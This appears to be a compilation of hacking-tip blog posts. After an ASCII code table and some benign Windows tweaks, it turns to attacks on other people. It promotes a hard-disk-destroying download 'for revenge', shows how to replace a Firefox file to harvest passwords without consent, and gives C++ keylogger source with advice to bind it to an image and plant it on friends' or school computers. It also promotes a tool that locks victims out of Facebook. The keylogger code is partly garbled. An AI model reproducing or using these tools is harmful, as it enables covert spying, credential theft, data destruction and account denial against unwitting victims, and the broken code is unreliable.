ASCII control characters

The following ASCII table contains both ASCII control characters, ASCII printable characters and the extended ASCII character set ISO 8859-1, also called ISO Latin1

ASCII control characters (character code 0-31)

The first 32 characters in the ASCII-table are unprintable control codes and are used to control peripherals such as printers.
DEC OCT HEX BIN Symbol HTML Number HTML Name Description
00000000000000NUL�Null char
10010100000001SOHStart of Heading
20020200000010STXStart of Text
30030300000011ETXEnd of Text
40040400000100EOTEnd of Transmission
80100800001000BSBack Space
90110900001001HT	Horizontal Tab
Line Feed
110130B00001011VTVertical Tab
120140C00001100FFForm Feed
Carriage Return
140160E00001110SOShift Out / X-On
150170F00001111SIShift In / X-Off
160201000010000DLEData Line Escape
170211100010001DC1Device Control 1 (oft. XON)
180221200010010DC2Device Control 2
190231300010011DC3Device Control 3 (oft. XOFF)
200241400010100DC4Device Control 4
210251500010101NAKNegative Acknowledgement
220261600010110SYNSynchronous Idle
230271700010111ETBEnd of Transmit Block
250311900011001EMEnd of Medium
280341C00011100FSFile Separator
290351D00011101GSGroup Separator
300361E00011110RSRecord Separator
310371F00011111USUnit Separator

ASCII printable characters (character code 32-127)

Codes 32-127 are common for all the different variations of the ASCII table, they are called printable characters, represent letters, digits, punctuation marks, and a few miscellaneous symbols. You will find almost every character on your keyboard. Character 127 represents the command DEL.
DEC OCT HEX BIN Symbol HTML Number HTML Name Description
320402000100000 Space
330412100100001!!Exclamation mark
340422200100010"""Double quotes (or speech marks)
390472700100111''Single quote
400502800101000((Open parenthesis (or open bracket)
410512900101001))Close parenthesis (or close bracket)
460562E00101110..Period, dot or full stop
470572F00101111//Slash or divide
600743C00111100<&#60;&lt;Less than (or open angled bracket)
620763E00111110>&#62;&gt;Greater than (or close angled bracket)
630773F00111111?&#63;Question mark
641004001000000@&#64;At symbol
651014101000001A&#65;Uppercase A
661024201000010B&#66;Uppercase B
671034301000011C&#67;Uppercase C
681044401000100D&#68;Uppercase D
691054501000101E&#69;Uppercase E
701064601000110F&#70;Uppercase F
711074701000111G&#71;Uppercase G
721104801001000H&#72;Uppercase H
731114901001001I&#73;Uppercase I
741124A01001010J&#74;Uppercase J
751134B01001011K&#75;Uppercase K
761144C01001100L&#76;Uppercase L
771154D01001101M&#77;Uppercase M
781164E01001110N&#78;Uppercase N
791174F01001111O&#79;Uppercase O
801205001010000P&#80;Uppercase P
811215101010001Q&#81;Uppercase Q
821225201010010R&#82;Uppercase R
831235301010011S&#83;Uppercase S
841245401010100T&#84;Uppercase T
851255501010101U&#85;Uppercase U
861265601010110V&#86;Uppercase V
871275701010111W&#87;Uppercase W
881305801011000X&#88;Uppercase X
891315901011001Y&#89;Uppercase Y
901325A01011010Z&#90;Uppercase Z
911335B01011011[&#91;Opening bracket
931355D01011101]&#93;Closing bracket
941365E01011110^&#94;Caret - circumflex
961406001100000`&#96;Grave accent
971416101100001a&#97;Lowercase a
981426201100010b&#98;Lowercase b
991436301100011c&#99;Lowercase c
1001446401100100d&#100;Lowercase d
1011456501100101e&#101;Lowercase e
1021466601100110f&#102;Lowercase f
1031476701100111g&#103;Lowercase g
1041506801101000h&#104;Lowercase h
1051516901101001i&#105;Lowercase i
1061526A01101010j&#106;Lowercase j
1071536B01101011k&#107;Lowercase k
1081546C01101100l&#108;Lowercase l
1091556D01101101m&#109;Lowercase m
1101566E01101110n&#110;Lowercase n
1111576F01101111o&#111;Lowercase o
1121607001110000p&#112;Lowercase p
1131617101110001q&#113;Lowercase q
1141627201110010r&#114;Lowercase r
1151637301110011s&#115;Lowercase s
1161647401110100t&#116;Lowercase t
1171657501110101u&#117;Lowercase u
1181667601110110v&#118;Lowercase v
1191677701110111w&#119;Lowercase w
1201707801111000x&#120;Lowercase x
1211717901111001y&#121;Lowercase y
1221727A01111010z&#122;Lowercase z
1231737B01111011{&#123;Opening brace
1241747C01111100|&#124;Vertical bar
1251757D01111101}&#125;Closing brace
1261767E01111110~&#126;Equivalency sign - tilde

The extended ASCII codes (character code 128-255)

There are several different variations of the 8-bit ASCII table. The table below is according to ISO 8859-1, also called ISO Latin-1. Codes 129-159 contain the Microsoft® Windows Latin-1 extended characters.
DEC OCT HEX BIN Symbol HTML Number HTML Name Description
1282008010000000&#128;&euro;Euro sign
1302028210000010&#130;&sbquo;Single low-9 quotation mark
1312038310000011ƒ&#131;&fnof;Latin small letter f with hook
1322048410000100&#132;&bdquo;Double low-9 quotation mark
1332058510000101&#133;&hellip;Horizontal ellipsis
1352078710000111&#135;&Dagger;Double dagger
1362108810001000ˆ&#136;&circ;Modifier letter circumflex accent
1372118910001001&#137;&permil;Per mille sign
1382128A10001010Š&#138;&Scaron;Latin capital letter S with caron
1392138B10001011&#139;&lsaquo;Single left-pointing angle quotation
1402148C10001100Œ&#140;&OElig;Latin capital ligature OE
1422168E10001110Ž&#142;Latin captial letter Z with caron
1452219110010001&#145;&lsquo;Left single quotation mark
1462229210010010&#146;&rsquo;Right single quotation mark
1472239310010011&#147;&ldquo;Left double quotation mark
1482249410010100&#148;&rdquo;Right double quotation mark
1502269610010110&#150;&ndash;En dash
1512279710010111&#151;&mdash;Em dash
1522309810011000˜&#152;&tilde;Small tilde
1532319910011001&#153;&trade;Trade mark sign
1542329A10011010š&#154;&scaron;Latin small letter S with caron
1552339B10011011&#155;&rsaquo; Single right-pointing angle quotation mark
1562349C10011100œ&#156;&oelig;Latin small ligature oe
1582369E10011110ž&#158;Latin small letter z with caron
1592379F10011111Ÿ&#159;&yuml;Latin capital letter Y with diaeresis
160240A010100000&#160;&nbsp;Non-breaking space
161241A110100001¡&#161;&iexcl;Inverted exclamation mark
162242A210100010¢&#162;&cent;Cent sign
163243A310100011£&#163;&pound;Pound sign
164244A410100100¤&#164;&curren;Currency sign
165245A510100101¥&#165;&yen;Yen sign
166246A610100110¦&#166;&brvbar;Pipe, Broken vertical bar
167247A710100111§&#167;&sect;Section sign
168250A810101000¨&#168;&uml;Spacing diaeresis - umlaut
169251A910101001©&#169;&copy;Copyright sign
170252AA10101010ª&#170;&ordf;Feminine ordinal indicator
171253AB10101011«&#171;&laquo;Left double angle quotes
172254AC10101100¬&#172;&not;Not sign
173255AD10101101­&#173;&shy;Soft hyphen
174256AE10101110®&#174;&reg;Registered trade mark sign
175257AF10101111¯&#175;&macr;Spacing macron - overline
176260B010110000°&#176;&deg;Degree sign
177261B110110001±&#177;&plusmn;Plus-or-minus sign
178262B210110010²&#178;&sup2;Superscript two - squared
179263B310110011³&#179;&sup3;Superscript three - cubed
180264B410110100´&#180;&acute;Acute accent - spacing acute
181265B510110101µ&#181;&micro;Micro sign
182266B610110110&#182;&para;Pilcrow sign - paragraph sign
183267B710110111·&#183;&middot;Middle dot - Georgian comma
184270B810111000¸&#184;&cedil;Spacing cedilla
185271B910111001¹&#185;&sup1;Superscript one
186272BA10111010º&#186;&ordm;Masculine ordinal indicator
187273BB10111011»&#187;&raquo;Right double angle quotes
188274BC10111100¼&#188;&frac14;Fraction one quarter
189275BD10111101½&#189;&frac12;Fraction one half
190276BE10111110¾&#190;&frac34;Fraction three quarters
191277BF10111111¿&#191;&iquest;Inverted question mark
192300C011000000À&#192;&Agrave;Latin capital letter A with grave
193301C111000001Á&#193;&Aacute;Latin capital letter A with acute
194302C211000010Â&#194;&Acirc;Latin capital letter A with circumflex
195303C311000011Ã&#195;&Atilde;Latin capital letter A with tilde
196304C411000100Ä&#196;&Auml;Latin capital letter A with diaeresis
197305C511000101Å&#197;&Aring;Latin capital letter A with ring above
198306C611000110Æ&#198;&AElig;Latin capital letter AE
199307C711000111Ç&#199;&Ccedil;Latin capital letter C with cedilla
200310C811001000È&#200;&Egrave;Latin capital letter E with grave
201311C911001001É&#201;&Eacute;Latin capital letter E with acute
202312CA11001010Ê&#202;&Ecirc;Latin capital letter E with circumflex
203313CB11001011Ë&#203;&Euml;Latin capital letter E with diaeresis
204314CC11001100Ì&#204;&Igrave;Latin capital letter I with grave
205315CD11001101Í&#205;&Iacute;Latin capital letter I with acute
206316CE11001110Î&#206;&Icirc;Latin capital letter I with circumflex
207317CF11001111Ï&#207;&Iuml;Latin capital letter I with diaeresis
208320D011010000Ð&#208;&ETH;Latin capital letter ETH
209321D111010001Ñ&#209;&Ntilde;Latin capital letter N with tilde
210322D211010010Ò&#210;&Ograve;Latin capital letter O with grave
211323D311010011Ó&#211;&Oacute;Latin capital letter O with acute
212324D411010100Ô&#212;&Ocirc;Latin capital letter O with circumflex
213325D511010101Õ&#213;&Otilde;Latin capital letter O with tilde
214326D611010110Ö&#214;&Ouml;Latin capital letter O with diaeresis
215327D711010111×&#215;&times;Multiplication sign
216330D811011000Ø&#216;&Oslash;Latin capital letter O with slash
217331D911011001Ù&#217;&Ugrave;Latin capital letter U with grave
218332DA11011010Ú&#218;&Uacute;Latin capital letter U with acute
219333DB11011011Û&#219;&Ucirc;Latin capital letter U with circumflex
220334DC11011100Ü&#220;&Uuml;Latin capital letter U with diaeresis
221335DD11011101Ý&#221;&Yacute;Latin capital letter Y with acute
222336DE11011110Þ&#222;&THORN;Latin capital letter THORN
223337DF11011111ß&#223;&szlig;Latin small letter sharp s - ess-zed
224340E011100000à&#224;&agrave;Latin small letter a with grave
225341E111100001á&#225;&aacute;Latin small letter a with acute
226342E211100010â&#226;&acirc;Latin small letter a with circumflex
227343E311100011ã&#227;&atilde;Latin small letter a with tilde
228344E411100100ä&#228;&auml;Latin small letter a with diaeresis
229345E511100101å&#229;&aring;Latin small letter a with ring above
230346E611100110æ&#230;&aelig;Latin small letter ae
231347E711100111ç&#231;&ccedil;Latin small letter c with cedilla
232350E811101000è&#232;&egrave;Latin small letter e with grave
233351E911101001é&#233;&eacute;Latin small letter e with acute
234352EA11101010ê&#234;&ecirc;Latin small letter e with circumflex
235353EB11101011ë&#235;&euml;Latin small letter e with diaeresis
236354EC11101100ì&#236;&igrave;Latin small letter i with grave
237355ED11101101í&#237;&iacute;Latin small letter i with acute
238356EE11101110î&#238;&icirc;Latin small letter i with circumflex
239357EF11101111ï&#239;&iuml;Latin small letter i with diaeresis
240360F011110000ð&#240;&eth;Latin small letter eth
241361F111110001ñ&#241;&ntilde;Latin small letter n with tilde
242362F211110010ò&#242;&ograve;Latin small letter o with grave
243363F311110011ó&#243;&oacute;Latin small letter o with acute
244364F411110100ô&#244;&ocirc;Latin small letter o with circumflex
245365F511110101õ&#245;&otilde;Latin small letter o with tilde
246366F611110110ö&#246;&ouml;Latin small letter o with diaeresis
247367F711110111÷&#247;&divide;Division sign
248370F811111000ø&#248;&oslash;Latin small letter o with slash
249371F911111001ù&#249;&ugrave;Latin small letter u with grave
250372FA11111010ú&#250;&uacute;Latin small letter u with acute
251373FB11111011û&#251;&ucirc;Latin small letter u with circumflex
252374FC11111100ü&#252;&uuml;Latin small letter u with diaeresis
253375FD11111101ý&#253;&yacute;Latin small letter y with acute
254376FE11111110þ&#254;&thorn;Latin small letter thorn
255377FF11111111ÿ&#255;&yuml;Latin small letter y with diaeresi

Customise START button Text in Windows

Tired of the boring old “start” button at the bottom left corner of your Windows XP’s monitor? Want something new to replace iit? Well here’s how to change it.
With a few modifications in the Windows Registry, you can replace the “start” text with anything you like. Great for achieving a new, custom look for your Windows XP. So let’s get started.

Warning: this tutorial is more for advanced users, and I'm not
responsible if your system gets messed up. Only attempt the following
at your own risk.

Step 1: Modify explorer.exe

If the warning didn’t scare you enough, then the title of this step probably did. Yes, we are going to change Explorer, the backbone of your Windows XP, but don’t worry. Everything should be safe as long as you follow the steps closely.
As explorer is a binary file, we need a special tool to modify it. One of the best ones for this purpose is Resource Hacker. There are of course others that will get the trick done, but we will be using RH this tutorial so I recommend installing it to avoid making mistakes. Install it and let’s continue.
As always before changing anything. you want to back up. So open My Computer and navigate to   and look for explorer. Copy paste it to a safe location on your hard drive.
Now that you’ve backed it up, fire up Resource Hacker and find the same explorer.exe.

When you’ve found and opened explorer in RH, navigate to String Table -> 37 -> 1033. The “start” value is on line 4, after the 578. Change the text “start” to anything you want, making sure you keep the quotes. In this example. I changed the text to
Press the Compile Script button to make Resource Hacker put together the code. Now click File and Save the script as explorer.exe. into C: \WINDOWS\inf or another C: \WINDOWS subfolder.
Note: make sure you choose Save AS, NOT just save!!
And that’s all for the first step! Now let’s move onto the second one -modifying the registry.

Step 2: changing the registry.

By now, you have a modified explorer sitting in the /inf/ subfolder, so we need to tell Windows to use that one, instead of the original one still resting untouched.
To do this, we need to make just one simple registry modification. To open up the registry, press start (something else soon  ) -> run and type regedit.
In the registry editor window that opens, navigate toHKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\ Windows NT\ CurrentVersion\ Winlogon and look for the registry entry “shell”. Click it.

Change the explorer.exe to inf/explorer.exe or whereever you saved the modified explorer.
And believe it or not, you’re done! All you have to do now is reboot or log out and bacö in to see the changes. Enjoy your new custom Windows XP start button!

Damage Hard Disk Of Your Enemy

HI guys, This time m back with a really Awesome technique if U R Having any Enemy n if you want to take revenge from Sumone.

This Tool, or software or watever, if You Opens this , It Would Simply go for destroying Your Hard Disk Forever.. No If No Buts, No Permissions, No Denies. 

Once started, it wud take any breathe after Killing Your HDD, so Bettter B aware n keep this Very safely , A Sngle Double Click can make u a l'l tensed..

N Finally I m gonna reveal this Out. These Are the links.



Go for downloading them, it wud nto show any virus, No Antivirus Wud detect it.

But u want to Go off with it, Disable your Antivirus or ur frns's n u r done.

Here is one more step which m not including, so u have to Put On Sum of ur Brain. If u r really a keen hacker, thn u probably knows wat u have to do nxt.

How to Operate Mouse Pointer Without Mouse

You have Mouse problem ??
I will give you suggestion 
Press Left Alt + Left Shift + Num Lock Button + Ok 

Press Left Alt + Left Shift + Num Lock Button+OK
with the help of Numeric Keypad e.g ( Press and Hold the following Keys )

7   8    9

4          6

1   2    3

For Normal Click Press 
Left Alt + Left Shift + Num Lock

Hide Entire Drive Partition without Registry

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.


2) Then type "list volume"
The result will look something like one as shown below-

3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".

Convert Firefox into keylogger

Do you want create your own working undectable keylogger and without any programming knowledge.The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent.

How this Keylogger Works?
Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.
We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.
Can this be detected by antivirus?
I have scanned it with Mcafee,Norton and Avast and it is totally undetectable.
Does It work on all websites?
It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail.
Now I will give you the step by step tutorial on how to use this trick
  1. Download this script here
  2. Now go to the following address
If you are Windows user then goto
C:/Program Files/Mozilla Firefox/Components

If you are MAC user then goto
Applications > Right click Firefox > Show Package Contents >Contents/MacOS/Components
  1. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.
  2. Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
  3. So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.

Create Keylogger in C++

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page. 

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Dev C++.  Download it from here:
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
char i;

while (1)
for(i = 8; i <= 190; i++)
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
system ("PAUSE");
return 0;

/* *********************************** */

int Save (int key_stroke, char *file)
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;

/* *********************************** */

void Stealth()
HWND Stealth;
Stealth = FindWindowA("ConsoleWindowClass", NULL);

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
if you have physical access to your college/school system,then copy the exe file in that system and run it.

Facebook Account Freezer

Facebook Freezer selects random login id and password combination to login to victim account. Due to wrong login attempts, Facebook temporarily bans the victim from logging in to his account. But, if Facebook Freezer is allowed to run on computer for a long time, Facebook bans victim from logging in to his account as long as Freezer is running. Thus, inspite of correct login id and password, victim is unable to login to his Facebook account. Thus, we are able to hack Facebook account using Facebook Freezer.

How to use Facebook Freezer:

Well, its very easy to use Facebook freezer to hack facebook account.

1. Free Download Facebook Freezer to hack facebook account.

2. Unzip the file and run Facebook freezer.exe file (works perfectly on Windows XP and Windows Vista) on your computer.

3. You will see something like this:

4. Now, enter the login id of the victim whose you wanna hack facebook account and hit on "Freeze". Facebook Freezer will start its work and within few minutes, victim's Facebook account will be freezed.

Note: For Facebook Freezer to freeze account, victim must logout from his Facebook account. So, use Facebook Freezer whenever you find victim not online on Facebook.

I hope this you can now hack facebook account using this Facebook Freezer. Facebook Freezer is one of the simplest ways used to hack Facebook account. If you have any problem in using this Facebook freezer to hack facebook account, please mention it in comments.

Enjoy Facebook Freezer to hack facebook account...Enjoy...